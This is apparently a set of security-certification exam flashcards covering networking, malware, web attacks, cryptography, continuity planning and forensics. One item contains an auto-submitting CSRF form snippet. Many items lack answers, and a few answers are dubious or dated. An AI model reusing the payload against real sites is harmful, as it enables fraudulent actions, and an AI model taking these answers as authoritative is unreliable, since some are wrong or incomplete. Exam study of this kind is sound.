Wi-Fi Protected Access II with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (WPA2 CCMP)
Your organization is planning to implement a wireless network using WPA2 Enterprise. Of the following choices, what is required?
An authentication server with a digital certificate installed on the authentication server.
WPA2 Enterprise requires an ______________ authentication server and most implementations require a digital certificate installed on the server.
You are assisting a small business owner in setting up a public wireless hot spot for her customers. Which of the following actions are MOST appropriate for this hot spot?
Enabling Open System Authentication
Open System Authentication is a good choice for a public wireless hot spot. It is used with ______________ and doesn't require users to enter a preshared key or passphrase.
Wired Equivalent Privacy (WEP)
Homer is able to connect to his company's wireless network with his smartphone but not with his laptop computer. Which of the following is the MOST likely reason for this disparity?
His company's network has a MAC address filter in place.
Management asks you if you can modify the wireless network to prevent users from easily discovering it. Which of the following would you modify to meet this goal?
A war driver is capturing traffic from a wireless network. When an authorized client connects, the attacker is able to implement a brute force attack to discover the encryption key. What type of attack did this war driver use?
______________ refers to two devices communicating when they are close to each other.
Near Field Communication (NFC)
An attacker is able to access email contact lists on your smartphone. What type of attack is this?
Attackers are able to access data (including email contact lists) on a smartphone in a ______________.
______________ is the practice of sending unsolicited messages to other Bluetooth devices.
Your organization is planning to implement a VPN and wants to ensure it is secure. Which of the following protocols is the BEST choice to use with the VPN?
IPsec is one of several protocols used to secure VPN traffic. ______________ is an older protocol used with VPNs but it is not as secure as IPsec. SFTP secures FTP transmissions, but not VPNs.
An automated process isolated a computer in a restricted VLAN because the process noticed the computer's antivirus definitions were not up to date. What is the name of this process?
Network Access Control (NAC)
Network Access Control (NAC) is a group of technologies that can inspect systems and control their access to a network. NAC can change a computer's IP address to quarantine it in a ______________.
Your organization wants to improve the security posture of internal database servers and protect against zero-day vulnerabilities. Of the following choices, what provides the BEST solution?
Disabling unnecessary services
Disabling unnecessary services helps reduce threats, including threats from __________. It also reduces the threat from open ports on a firewall if the associated services are disabled.
You need to monitor the security posture of several servers in your organization and keep a security administrator aware of their status. Which of the following tasks will BEST help you meet this goal?
Establishing baseline reporting
Establishing baseline reporting processes allows you to monitor the systems and identify any changes from the baseline that might affect their security posture. You would determine the _________ prior to establishing a baseline.
Maggie is compiling a list of approved software for desktop operating systems within a company. What is the MOST likely purpose of this list?
Host software baseline
A host software baseline, also called an __________________, identifies a list of approved software for systems and compares it with installed applications.
An _____________________ identifies proper settings for applications.
application configuration baseline
Your organization wants to ensure that employees do not install or play operating system games, such as solitaire and FreeCell, on their computers. Which of the following is the BEST choice to prevent this?
Application whitelisting identifies authorized applications and prevents users from installing or running any other applications. An Application _____________ can be used to identify specific applications that cannot be installed or run on a system.
A ________________ can state a rule to discourage a behavior, such as installing and playing games during work, but it doesn't enforce the rule by preventing users from installing or running the software.
An IT department recently had its hardware budget reduced, but the organization still expects them to maintain availability of services. Of the following choices, what would BEST help them maintain availability with a reduced budget?
________________ provides increased availability because it is much easier to rebuild a virtual server than a physical server after a failure. It also supports a reduced budget because virtual servers require less hardware, less space in a data center, less power, and less heating and air conditioning.
You are preparing to deploy a new application on a virtual server. The virtual server hosts another server application that employees routinely access. Which of the following is the BEST method to use when deploying the new application?
Taking a snapshot of the VM before deploying the new application.
A recent risk assessment identified several problems with servers in your organization. They occasionally reboot on their own and the operating systems do not have current security fixes. Administrators have had to rebuild some servers from scratch due to mysterious problems. Which of the following solutions will mitigate these problems?
Administrators ensure server operating systems are updated at least once a month with relevant patches, but they do not track other software updates. Of the following choices, what is the BEST choice to mitigate risks on these servers?
Application Patch Management
Homer noticed that several generators within the nuclear power plant have been turning on without user interaction. Security investigators discovered that an unauthorized file was installed and causing these generators to start at timed intervals. Further, they determined this file was installed during a visit by external engineers. What should Homer recommend to mitigate this threat in the future?
Configure the SCADA within a VLAN to isolate them
Your company has recently provided mobile devices to several employees. A security manager has expressed concerns related to data saved on these devices. Which of the following would BEST address these concerns?
Disabling the use of removable media
Which of the following is the MOST likely negative result if administrators do not implement access controls correctly on an encrypted USB hard drive?
Security controls can be bypassed
Your company provides electrical and plumbing services to homeowners. Employees use tablets during service calls to record activity, create invoices, and accept credit card payments. Which of the following would BEST prevent disclosure of customer data if any of these devices are lost or stolen?
Key personnel in your organization have mobile devices, which store sensitive information. What can you implement to prevent data loss from these devices if a thief steals one?
Screen lock, account lockouts, full device encryption, and remote wipe capabilities
Which of the following represents a primary security concern when authorizing mobile devices on a network?
Your company is planning on implementing a policy for users so that they can connect their mobile devices to the network. However, management wants to restrict network access for these devices. They should have Internet access and be able to access some internal servers, but management wants to ensure that they do not have access to the primary network where company-owned devices operate. Which of the following will BEST meet this goal?
Your organization hosts a web site with a back-end database. The database stores customer data, including credit card numbers. Which of the following is the BEST way to protect the credit card data?
Database column encryption
___________ can be used to encrypt the fields holding credit card data, but not fields that don't need to be encrypted.
Database column (or field) encryption
Bart copied an encrypted file from his desktop computer to his USB drive and discovered that the copied file isn't encrypted. He asks you what he can do to ensure files he's encrypted remain encrypted when he copies them to a USB drive. What would you recommend as the BEST solution to this problem?
Use whole disk encryption on the USB drive
Management wants to ensure that employees do not print any documents that include customer PII. Which of the following solutions would meet this goal?
A ___________ solution can limit documents sent to a printer to be printed using content filters.
data loss prevention (DLP)
A hardware security module (HSM) and trusted platform module (TPM) provide ___________.
Full disk encryption
Of the following choices, which one is a cloud computing option that allows customers to apply patches to the operating system?
Infrastructure as a service (IAAS)
___________ is a cloud computing option where the vendor provides access to a computer, but customers must manage the system, including keeping it up to date with current patches.
Infrastructure as a service (IAAS)
Which of the following types of malware is the MOST difficult to reverse engineer?
Recently, malware on a company computer destroyed several important files after it detected that Homer was no longer employed at the company. Which of the following BEST identifies this malware?
An _________ uses one or more techniques to make it difficult for antivirus researchers to reverse engineer it.
A _________ executes in response to an event.
A recent antivirus scan on a server detected a Trojan. A technician removed the Trojan, but a security administrator expressed concern that unauthorized personnel might be able to access data on the server. The security administrator decided to check the server further. Of the following choices, what is the administrator MOST likely looking for on this server?
After Maggie turned on her computer, she saw a message indicating that unless she made a payment, her hard drive would be formatted. What does this indicate?
A security administrator recently noticed abnormal activity on a workstation. It is connecting to computers outside the organization's internal network, using uncommon ports. Using a security toolkit, the administrator discovered the computer is also running several hidden processes. Which of the following choices BEST indicates what the administrator found?
A _________ typically runs processes that are hidden and it also attempts to connect to computers via the Internet.
What type of malware uses marketing pop-ups and does not attempt to hide itself?
Of the following malware types, which one is MOST likely to monitor a user's computer?
Lisa is a database administrator and received a phone call from someone identifying himself as a technician working with a known hardware vendor. The technician said he's aware of a problem with database servers they've sold, but it only affects certain operating system versions. He asks Lisa what operating system the company is running on its database servers. Which of the following choices is the BEST response from Lisa?
Thank the caller, end the call, report the call to her supervisor, and independently check the vendor for issues.
A security administrator at a shopping mall discovered two wireless cameras pointing at an ATM. These cameras were not installed by mall personnel and are not authorized. What is the MOST likely goal of these cameras?
Bart is in a break area outside the office. He told Lisa that he forgot his badge inside and asked Lisa to let him follow her when she goes back inside. What does this describe?
An organization's security policy requires employees to incinerate paper documents. Of the following choices, which type of attack is this MOST likely to prevent?
While cleaning out his desk, Bart threw several papers containing PII into the recycle bin. Which type of attack can exploit this action?
Marge reports that she keeps receiving unwanted emails about personal loans. What does this describe?
A recent spear phishing attack that appeared to come from your organization's CEO resulted in several employees revealing their passwords to attackers. Management wants to implement a security control to provide assurances to employees that email that appears to come from the CEO actually came from the CEO. Which of the following should be implemented?
Attackers are targeting C-level executives in your organization. Which type of attack is this?
You manage a group of computers in an isolated network without Internet access. You need to update the antivirus definitions manually on these computers. Which of the following choices is the MOST important concern?
Ensuring the definition file hash is equal to the hash on the antivirus vendor's website
A user wants to reduce the threat of an attacker capturing her personal information while she surfs the Internet. Which of the following is the BEST choice?
Bart is complaining that new browser windows keep opening on his computer. Which of the following is the BEST choice to stop these in the future?
Your organization recently suffered a loss from malware that wasn't previously known by any trusted sources. Which type of attack is this?
Homer received an email advertising the newest version of a popular smartphone, which is not available elsewhere. It includes a malicious link. Which of the following principles is the email author using?
A user complains that his system is no longer able to access the blogs.getcertifiedahead.com site. Instead, his browser goes to a different site. After investigation, you notice the following entries in the user's hosts file:
What is the BEST explanation for this entry?
Homer recently received an email thanking him for a purchase that he did not make. He asked an administrator about it and the administrator noticed a pop-up window, which included the following code:
< body onload =" document.getElementByID(' myform'). submit()" > < form id =" myForm" action =" gcgapremium.com/ purchase.php" method =" post" < input name =" Buy Now" value =" Buy Now" /> </ form > </ body >
What is the MOST likely explanation?
cross-site request forgery attack (XSRF)
An IDS alerts on increased traffic. Upon investigation, you realize it is due to a spike in network traffic from several sources. Assuming this is malicious, what is the MOST likely explanation?
A network administrator needs to ensure the company's network is protected against smurf attacks. What should the network administrator do?
Verify border routers block directed broadcasts
__________ are blocked by preventing routers from passing directed broadcasts, especially border routers with direct access to the Internet.
Some protocols include timestamps and sequence numbers. These components help protect against what type of attacks?
Which of the following is the BEST method to protect against someone trying to guess the correct PIN to withdraw money from an ATM?
An application stores user passwords in a hashed format. Which of the following can decrease the likelihood that attackers can discover these passwords?
Security analysts recently discovered that users in your organization are inadvertently installing malware on their systems after visiting the compai.org web site. What is the MOST likely explanation for this activity?
An attacker recently attacked a web server hosted by your company. After investigation, security professionals determined that the attacker used a previously unknown application exploit. Which of the following BEST identifies this attack?
Which of the following developer techniques results in significant security vulnerabilities for online web site applications?
poor input validation
Buffer overflow and cross-site forgery (XSRF) attacks can be mitigated by _________.
An attacker is bypassing client-side input validation by intercepting and modifying data within the HTTP POST command. Which of the following does the attacker use in this attack?
An attacker can use a web proxy to intercept the _____________ command. The attacker then modifies the data in the command and sends it to the web site.
______________ catches errors, allowing applications to handle them gracefully.
Web developers are implementing error and exception handling in a web site application. Which of the following represents a best practice for this?
Displaying a generic error message but logging detailed information about the error.
While reviewing logs for a web application, a developer notices that it has crashed several times reporting a memory error. Shortly after it crashes, the logs show malicious code that isn't part of a known application. What is MOST likely occurring?
______________ often cause an application to crash and expose system memory. Attackers then write malicious code into the exposed memory and use different techniques to get the system to run this code.
Buffer overflow attacks
An application on one of your database servers has crashed several times recently. Examining detailed bugging logs, you discover that just prior to crashing, the database application is receiving a long series of x90 characters. What is MOST likely occurring?
Buffer overflow attacks include a series of no operation (NOP) commands, such as ______________. When successful, they can crash applications and expose memory, allowing attackers to run malicious code on the system.
hexadecimal 90 (x90)
Attackers have attacked an online web server using a SQL injection attack. Which of the following BEST describes this?
The attacker is attempting to pass commands to a back-end database server to access data.
A _________________ can be blocked by using input validation techniques to filter special characters such as the < and > characters used in HTML code.
cross-site scripting (XSS) attack
Which of the following is an attack against servers hosting a directory service?
LDAP injection attack
A LDAP injection attack attempts to access data on servers hosting a directory service, such as Microsoft domain controller hosting ____________.
Cross-site scripting (XSS) and cross-site request forgery (XSRF) attacks attack ___________.
Your organization hosts a web site within a DMZ and the web site accesses a database server in the internal network. ACLs on firewalls prevent any connections to the database server except from the web server. Database fields holding customer data are encrypted and all data in transit between the web site server and the database server are encrypted. Which of the following represents the GREATEST risk to the data on the server?
A _________________ allows an attacker to send commands to the database server to access data.
SQL injection attack
A security tester is sending random data to a program. What does this describe?
Your organization is preparing to deploy a web-based application which will accept user input. Which of the following test the reliability of this application to maintain availability and data integrity?
While analyzing a packet capture log, you notice the following entry:
16:12:50, src 10.80.1.5:3389, dst 192,168,1,100:8080, syn/ack
Of the following choices, what is the BEST explanation of this entry?
An RDP connection attempt
Which of the following is most closely associated with residual risk?
____________ is the risk that an organization accepts after implementing controls to reduce risk.
____________ attempts to discourage attacks with preventative controls such as a security guard.
___________ reduces risks through internal controls.
Purchasing insurance is a common method of ____________.
You need to calculate the ALE for a server. The value of the server is $3,000, but it has crashed 10 times in the past year. Each time it crashed, it resulted in a 10 percent loss. What is the ALE?
$3,000 It is calculated as SLE x ARO ($300 x 10)
You need to calculate the expected loss of an incident. Which of the following value combinations would you MOST likely use?
ALE and ARO The expected loss is the SLE and you can calculate it with the ALE and ARO as ALE / ARO.
You want to identify all of the services running on a server. Which of the following tools is the BEST choice to meet this goal?
A ______________ identifies open ports on a system and is commonly used to determine what services are running on the system.
You recently completed a vulnerability scan on your network. It reported that several servers are missing key operating system patches. However, after checking the servers, you've verified the servers have these patches installed. Which of the following BEST describes this?
You suspect that a database server used by a web application does not have current patches. Which of the following is the BEST action to take to verify the server has up-to-date patches?
You need to perform tests on your network to identify missing security controls. However, you want to have the least impact on systems that users are accessing. Which of the following tools is the best to meet this need?
Lisa needs to identify if a risk exists on a web application and if attackers can potentially bypass security controls. However, she should not actively test the application. Which of the following is the BEST choice?
Perform a vulnerability scan
A recent vulnerability scan reported that a web application server is missing some patches. However, after inspecting the server, you realize that the patches are for a protocol that administrators removed from the system. Which of the following is the BEST explanation for this disparity?
A ______________ on a vulnerability scan indicates that a vulnerability is positively detected, but the vulnerability doesn't actually exist.
A ______________ on a vulnerability scan indicates that the vulnerability scan did not detect a vulnerability that does exist on a system.
Your organization develops web application software, which it sells to other companies for commercial use. Your organization wants to ensure that the software isn't susceptible to common vulnerabilities, such as buffer overflow attacks and race conditions. What should the organization implement to ensure software meets this standard?
A ____________ goes line-by-line through the software code looking for vulnerabilities, such as buffer overflows and race conditions.
_______________ helps prevent buffer overflows, but not race conditions.
_____________ controls help prevent unintended outages from unauthorized changes.
_____________ is a type of testing used to ensure that new patches do not cause errors.
An organization has a legacy server within the DMZ. It is running older software that is not compatible with current patches, so it remains unpatched. Management accepts the risk on this system, but wants to know if attackers can access the internal network if they successfully compromise this server. Which of the following is the MOST appropriate test?
Testers do not have access to product documentation or any experience with an application. What type of test will they MOST likely perform?
Your organization has hired a group of external testers to perform a black box penetration test. One of the testers asks you to provide information about your internal network. What should you provide?
Black box testers should not have access to any information before starting the test, so technicians and administrators should not provide any information if asked. It is appropriate to give ______________ testers all the information on the network.
A network administrator is troubleshooting a communication problem between a web server and a database server. Which of the following tools would MOST likely be useful in this scenario?
A ____________ is useful for capturing traffic between systems for analysis.
A network administrator needs to identify the type of traffic and packet flags used in traffic sent from a specific IP address. Which of the following is the BEST tool to meet this need?
Security administrators have recently implemented several security controls to enhance the network's security posture. Management wants to ensure that these controls continue to function as intended. Which of the following tools is the BEST choice to meet this goal?
Your organization recently hired an outside security auditor to review internal processes. The auditor identified several employees who had permissions for previously held jobs within the company. What should the organization implement to prevent this in the future?
user rights and permissions reviews
Your organization's security policy states that administrators should follow the principle of least privilege. Which of the following tools can ensure that administrators are following the policy?
user rights and permissions review
Your organization wants to ensure that security controls continue to function, helping to maintain an appropriate security posture. Which of the following is the BEST choice to meet this goal?
continuous security monitoring
While creating a web application, a developer adds code to limit data provided by users. The code prevents users from entering special characters. Which of the following attacks will this code MOST likely prevent?
A ______________ captures traffic and then performs an offline brute force attack to discover the encryption key.
Wi-Fi Protected Access (WPA) cracking attack
An organization needs to improve fault tolerance to increase data availability. However, the organization has a limited budget. Which of the following is the BEST choice to meet the organization's needs?
Your organization hosts a web site with a back-end database server. During a recent power outage, the server crashed, resulting in a significant amount of lost data. Which of the following can your organization implement to prevent this loss from occurring again?
The ________________ identifies the time period when you plan to restore a system after an outage.
Recovery Time Objective (RTO)
A network administrator configured several servers to work together to increase the processing capabilities for a web application. What does the administrator MOST likely implement?
_____________ shifts the load between multiple servers to increase the number of clients the application can handle, ultimately increasing the overall processing capabilities.
______________ adds one or more servers for high availability; it also shifts the load among multiple systems and can increase a site's availability by adding additional nodes when necessary, but does not increase processing capabilities.
A redundant array of inexpensive disks (___________) provides fault tolerance for the disk subsystem, but does not increase processing capabilities.
Your company's web site experiences a large number of client requests during certain times of the year. Which of the following could your company add to ensure the web site's availability during these times?
Your organization hosts a high-volume web site, which generates a significant amount of revenue. You are asked to recommend a method to increase the availability of this web site. Which of the following choices is the BEST choice?
Your backup policy for a database server dictates that the amount of time needed to perform backups should be minimized. Which of the following backup plans would BEST meet this need?
Full backups on Sunday and incremental backups every other day of the week.
After a full backup, _________ backups back up data that has changed or is different since the last full backup. For example, if a full backup was on Sunday night, on Monday night, all files that changed since Sunday night would be backed up and on Tuesday night, all files would again be backed up that had changed from the Sunday night full backup.
After a full backup, _________ backups back up data that has changed since the last backup. This includes either the last full backup, or the last incremental backup. For example, if a full backup was on Sunday night, on Monday night, all files that changed since Sunday night would be backed up and on Tuesday night, only the files that changed since the Monday night backup would be backed up.
A business continuity expert is creating a business impact analysis (BIA). Which of the following elements is MOST likely to be omitted from the BIA?
A _____________ identifies critical systems, components, and functions, dependencies, critical downtime limits, potential scenarios causing a loss, and the potential loss; however, it does not include recommended solutions, recovery methods, or procedures.
business impact analysis (BIA)
After a recent attack causing a data breach, an executive is analyzing the financial losses. She determined that the attack is likely to cost at least $1 million. She wants to ensure that this information is documented for future planning purposes. Where is she MOST likely to document it?
business impact analysis (BIA)
A __________________ includes methods used to recover from an outage. It typically includes a hierarchical list of critical systems that identifies what to restore and in what order.
disaster recovery plan (DRP)
___________________ includes methods, such as alternate sites, used to keep an organization operational after an outage.
Continuity of operations planning (COOP)
The __________________ identifies the time period when you plan to restore a system after an outage; it is not a document.
Recovery time objective (RTO)
You are helping implement your company's business continuity plan. For one system, the plan requires an recovery time objective (RTO) of five hours and an recovery point objective (RPO) of one day. Which of the following would meet this requirement?
Ensure the system can be restored within five hours and ensure it does not lose more than one day of data.
The ________________ refers to the amount of data you can afford to lose, not time to restore a system.
Recovery point objective (RPO)
An organization is considering an alternate location as part of its business continuity plan. It wants to identify a solution that provides the shortest recovery time. What will it choose?
Your organization is working on its business continuity plan. Management wants to ensure that documents provide detailed information on what technicians should do after an outage. Specifically, they want to list the systems to restore and the order in which to restore them. What document includes this information.
disaster recovery plan (DRP)
Your organization is updating its disaster recovery documents. You're asking to review the communication plans for possible updates. Which of the following should you ensure is included in the communication plan?
Methods used to communicate with response team members, employees, suppliers, and customers
A business continuity plan (BCP) includes a chart listing roles within the organization along with their matching responsibilities during a disaster. It also includes a chain of command. What is the purpose of this chart.
_________________ clarifies who can make decisions during a disaster and can be documented in a chart listing roles and responsibilities along with a chain of command.
______________ focuses on recovery of IT systems.
IT contingency planning
The business continuity plan (BCP) coordinator at your organization is leading a meeting on-site with key disaster recovery personnel. The purpose of the meeting is to perform a test. What type of test is this?
A ________________ is discussion-based and is typically performed in a classroom or conference room setting.
______________ are hands-on exercises and include simulations and full-blown tests.
Personnel within your organization turned off the HR data server for six hours to perform a test. Which of the following is the MOST likely purpose of this?
continuity of operations planning (COOP)
Turning off a server for testing is to test elements of ______________. This helps to determine if the organization can continue to operate despite the outage.
continuity of operations planning (COOP)
Humidity controls in your data center are failing. You need to convince management of the importance of these. What would you tell them?
Failing humidity controls can cause damage from electro-static discharge (ESD) and condensation.
______________ do not provide any protection against electromagnetic interference (EMI), temperature, or ventilation.
Your organization is evaluating replacement HVAC systems and is considering increasing current capacities. Which of the following is a potential security benefit of increasing the HVAC capabilities?
Higher meant time before failure (MTBF) times of hardware components due to lower temperatures
Increasing the heating, ventilation, and air conditioning (HVAC) capacity results in higher mean time between failures (MTBF) times by keeping systems at lower temperatures. ____________ indicate more failures.
Without adequate physical security controls, attackers can cause significant damage to systems within a data center. Which of the following could an attacker manipulate to cause extensive physical damage?
An attacker was able to sneak into your building but was unable to open the server room door. He bashed the proximity badge reader with a portable fire extinguisher and the door opened. What is the MOST likely reason that the door opened?
The access system was designed to fail-open for personal safety.
Which of the following is an environmental control?
Fencing, video surveillance, and motion detection are all __________.
physical security controls
Of the following choices, what can you use to verify data integrity?
_____________ is one of many available hashing algorithms used to verify data integrity.
Secure Hash Algorithm (SHA)
Advanced Encryption Standard (AES), Data Encryption Standard (DES), and Rivest Cipher 4 (RC4) are ______________.
symmetric encryption algorithms
A security technician runs an automated script every night designed to detect changes in files. Of the following choices, what are the most likely protocols used in this script?
MD5 and HMAC
___________, such as Message Digest 5 (MD5) and Hash-based Message Authentication Code (HMAC) can detect changes in files (or verify files have not lost integrity).
______________ is a method used to secure email communication.
Pretty Good Privacy (PGP)
Elliptic curve cryptography (ECC), Advanced Encryption Standard (AES), and TwoFish are all examples of ____________.
Some encryption algorithms use stream ciphers and some use block ciphers. Which of the following are examples of block ciphers.
AES, DES, 3DES, and Blowfish
RC4 is a ____________ cipher.
Which of the following algorithms encrypts data in 64-bit blocks?
DES, 3DES, and Blowfish
Which of the following algorithms encrypts data in 128-bit blocks?
AES and Twofish
Which of the following algorithm(s) encrypts data one bit at a time?
An application developer needs to use an encryption protocol to encrypt credit card data within a database used by the application. Which of the following would be the FASTEST, while also providing strong confidentiality?
Blowfish, when compared against AES-256
Your organization uses several different types of cryptographic techniques. Which of the following techniques uses a private key and a public key?
Rivest, Shamir, Adleman (RSA)
Your network requires a secure method of sharing encryption keys over a public network. Which of the following is the BEST choice?
Diffie-Hellman allows entities to negotiate encryption keys securely over a public network. Once the entities negotiate the keys, they use ___________, but they can't share keys using symmetric encryption without first using a secure method such as Diffie-Hellman.
_________ is a key stretching technique used by some Unix systems to make password cracking more difficult.
Your organization plans to issue some employees mobile devices such as smartphones and tablets. These devices don't have a lot of processing power. Which of the following cryptographic methods has the LEAST overhead and will work with these mobile devices?
Elliptic Curve Cryptography (ECC) has minimal overhead and is often used with mobile devices for encryption. &
_________ consumes a lot of processing time and isn't as efficient as Elliptic Curve Cryptography (ECC).
Triple Data Encryption Standard (3DES)
Password-Based Key Derivation Function 2 (PBKDF2) and bcrypt are _________ that salt passwords with additional bits to protect against brute force attempts.
key stretching techniques
A manager is suspected of leaking trade secrets to a competitor. A security investigator is examining his laptop and notices a large volume of vacation pictures on the hard drive. Data on this laptop automatically uploads to a private cloud owned by the company once a week. The investigator noticed that the hashes of most of the pictures on the hard drive are different from the hashes of the pictures in the cloud location. Which of the following is the MOST likely explanation for this scenario?
The manager is leaking data using steganography methods.
A heavily used application accesses a financial database on a server within your network. Due to recent data breaches, management wants to ensure transport encryption protects this data. Which of the following algorithms is the BEST choice to meet this goal?
Transport Layer Security (TLS) is a transport encryption protocol that can protect data while it is in transit. TLS and SSL both use certificates and revoked certificates are published in a _________.
certificate revocation list (CRL)
You are planning to encrypt data in transit. Which of the following protocols meets this need and encapsulates IP packets within an additional IP header?
TLS and SSL are both _________ that can protect data while in transit, although they do not encapsulate IP packets within an additional IP header.
transport encryption protocols
Homer wants to send a secure email to Marge so he decides to encrypt it. Homer wants to ensure Marge can verify that he sent it. Which of the following does Marge need to verify the certificate that Homer used in this process is valid?
The CA's public key
Bart wants to send a secure email to Lisa so he decides to encrypt it. Bart wants to ensure that Lisa can verify that he sent it. Which of the following does Lisa need to meet this requirement?
Bart's public key
Users in your organization sign their emails with digital signatures. What provides integrity for these certificates?
Hashing provides integrity for ____________which are a hash of the message encrypted with the sender's private key and provide non-repudiation.
An application requires users to log on with their passwords. The application developers want to store the passwords in such a way that it will thwart rainbow table attacks. What key stretching techniques could you use?
bcrypt or PBKDF2
Homer wants to use digital signatures for his emails and realizes he needs a certificate. Which of the following will issue Homer a certificate?
Certificate Authority (CA)
You need to submit a certificate signing request (CSR) to a Certificate Authority (CA). Which of the following would you do FIRST?
Generate a new RSA-based private key
When submitting a certificate signing request (CSR) to a Certificate Authority (CA), first you create the RSA-based private key and then create the matching _________ from it, which you include in the certificate signing request (CSR) that you send to the Certificate Authority (CA).
Your organization is planning to implement an internal PKI. What is required to ensure users can validate certificates?
certificate revocation list (CRL)
A certificate revocation list (CRL) includes a list of revoked certificates and it allows users to _________ certificates.
Your organization requires the use of a PKI and it wants to implement a protocol to validate trust with minimal traffic. Which of the following protocols validates trust by returning short responses, such as "good" or "revoked"?
Online Certificate Status Protocol (OCSP)
A user's laptop developed a problem and can no longer boot. Help desk personnel tried to recover the data on the disk, but the disk is encrypted. Which of the following can be used to retrieve data from the hard disk?
A recovery agent can decrypt data and messages if the user's _________ is no longer available.
A security manager needs to identify a policy that will reduce the risk of personnel within an organization colluding to embezzle company funds. Which of the following is the BEST choice?
A security auditor discovered that several employees in the Accounting department can print and sign checks. In her final report, she recommended restricting the number of people who can print checks and the number of people who can sign them. She also recommended that no one should be authorized to print and sign checks. What policy is she recommending?
separation of duties
A __________ prevents any single person from performing multiple job functions that might allow the person to commit fraud.
separation of duties principle
__________ specifies that every object has an owner.
Discretionary access control
Your organization includes a software development division within the IT department. One developer writes and maintains applications for the Sales and Marketing departments. A second developer writes and maintains applications for the Payroll department. Once a year, they have to switch roles for at least a month. What is the purpose of this practice?
To enforce a job rotation policy
An __________ informs users of their responsibilities when using an organization's equipment.
acceptable use policy
A security manager is reviewing security policies related to data loss. Which of the following is the security administrator MOST likely to be reviewing?
clean desk policy
A __________ requires users to organize their areas to reduce the risk of possible data theft and password compromise.
clean desk policy
Get Certified Get Ahead (GCGA) has outsourced some application development to your organization. Unfortunately, developers at your organization are having problems getting an application module to work and they want to send the module with accompanying data to a third-party vendor for help in resolving the problem. Which of the following should developers consider before doing so?
review NDAs and verify that sharing data with a third party doesn't violate any existing NDAs
Two companies have decided to work together on a project and implemented an MOU. Which of the following represents the GREATEST security risk in this situation?
an MOU doesn't have strict guidelines to protect sensitive data
An __________ includes strict requirements for connections and is often used with an MOU.
interconnection security agreement (ISA)
Your organization is considering storage of sensitive data in a cloud provider. Your organization wants to ensure the data is encrypted while at rest and while in transit. What type of interoperability agreement can your organization use to ensure the data is encrypted while in transit?
interconnection security agreement (ISA)
A __________ stipulates performance expectations of a vendor.
service level agreement (SLA)
A user recently worked with classified data on an unclassified system. You need to sanitize all the reclaimed space on this system's hard drives while keeping the system operational. Which of the following methods will BEST meet this goal?
use a cluster tip wiping tool
A cluster tip wiping tool sanitizes reclaimed space on hard drives. The __________ is the extra space in the last cluster of a file, which can hold remnants of data.
A __________ successfully erases a file, but does not affect clusters in reclaimed space.
file shredding tool
__________ the disk magnetically erases it.
A network administrator needs to update the operating system on switches used within the network. Assuming the organization is following standard best practices, what should the administrator do first?
Submit a request using the change management process
Security personnel recently released an online training module advising employees not to share personal information on any social media web sites that they visit. What is this advice MOST likely trying to prevent?
cognitive password attacks
A __________ utilizes information that a person would know, such as the name of their first pet or their favorite color. If this information is available on Facebook or another social media site, attackers can use it to change the user's password.
cognitive password attack
A __________ is a password attack, but it uses a database of precalculated hashes.
rainbow table attack
Your organization blocks access to social media web sites. The primary purpose is to prevent data leakage, such as accidental disclosure of proprietary information. What is an additional security benefit of this policy?
protects against banner ad malware
Your organization hosts a web-based server that remote administrators access via Telnet. Management wants to increase their rights to prosecute unauthorized personnel who access this server. Which of the following is the BEST choice?
add a warning banner
An incident response team is following typical incident response procedures. Which of the following phases is the BEST choice for analyzing an incident with a goal of identifying steps to prevent a reoccurrence of the incident?
You should analyze an incident during the lessons learned stage of __________ with the goal of identifying steps to prevent reoccurrence.
After a recent incident, a forensic analyst was given several hard drives to analyze. What should the analyst do first?
take hashes and capture system images
Forensic analysts capture images and take hashes before beginning analysis, and they only analyze the __________, not the original drive. This protects it from accidental modification and preserves it as usable evidence.
A forensic expert is preparing to analyze a hard drive. Which of the following should the expert do FIRST?
capture an image
A security analyst tagged a computer stating when he took possession of it. What is the BEST explanation for this?
to begin a chain of custody
You are helping your organization create a security policy for incident response. What should be included when an incident requires confiscation of a physical asset?
keep a record of everyone who took possession of the physical asset
It is important to keep a chain of custody for any confiscated physical items and the __________is a record of everyone who took possession of an asset after it was first confiscated.
chain of custody
Hashes should be taken before __________, but they are not required before confiscating equipment.
capturing an image
An administrator recently learned of an attack on a Virginia-based web server from IP address 126.96.36.199 at 11:35:33 GMT. However, after investigating the logs, he is unable to see any traffic from that IP address at that time. Which of the following is the MOST likely reason why the administrator was unable to identify the attack?
he did not account for time offsets
Personnel in an organization are sharing their access codes to cipher locks with unauthorized personnel. As a result, unauthorized personnel are accessing restricted areas of the building. What is the BEST response to reduce this risk?
provide security training to personnel
Your organization has spent a significant amount of money on training employees on security awareness. Your organization wants to validate the success of this training. Which of the following is the BEST choice?
__________ are measurements and you can use them to validate the success of a security awareness program.
A web server has recently been attacked and a first responder has disconnected it from the network to isolate it. A forensic analyst is preparing to analyze the server but needs to capture the data in a specific order to ensure it is preserved. Of the following, which is the most volatile and should be collected first? RAM, SWAP, CPU Cache, Remote Logs, Hard Drive
A __________ is more volatile than regular RAM because a system has significantly less cache memory than regular RAM, so a system will overwrite cache quicker than regular RAM.
A web server has recently been attacked and a first responder has disconnected it from the network to isolate it. A forensic analyst is preparing to analyze the server but needs to capture the data in a specific order to ensure it is preserved. Of the following, which is slightly less volatile than cache memory and should be collected second? RAM, SWAP, CPU Cache, Remote Logs, Hard Drive
RAM and cache memory will be lost if the system is __________.
A __________ is an extension of RAM, but it is stored on the hard drive. The swap file is rebuilt each time the system is rebooted; so it is more volatile than regular data stored on a hard drive.
SWAP (or paging file)
Data on the __________ is semi-permanent. It remains on the hard drive even after the system is powered down and rebooted.
__________ are less volatile than data stored on a target system. For this reason, many servers send log data to a remote system for centralized collection. Even if a server is completely destroyed, the centralized logs remain unmodified.
Lisa hid several plaintext documents within an image file. Which security goal is she pursuing?
You are the security administrator in your organization. You want to ensure that a file maintains integrity. Which of the following choices is the BEST choice to meet your goal?
An e-commerce web site does not currently have an account recovery process for customers who have forgotten their passwords. Which of the following choices are the BEST items to include if web site developers add this process?
Create a web-based form that verifies customer identities using another method AND set a temporary password that expires upon first use.
Your organization is planning to implement stronger authentication for remote access users. An updated security policy mandates the use of token-based authentication with a password that changes every 30 seconds. Which of the following choices BEST meets this requirement?
Time-based One-Time Password (TOTP)
____________ creates passwords that do not expire.
HMAC-based One-Time Password (HOTP)
_____________ uses a nonce (a number used once), but a nonce does not expire after 30 seconds like a Time-based One-Time Password (TOTP) does.
Challenge Handshake Authentication Protocol (CHAP)
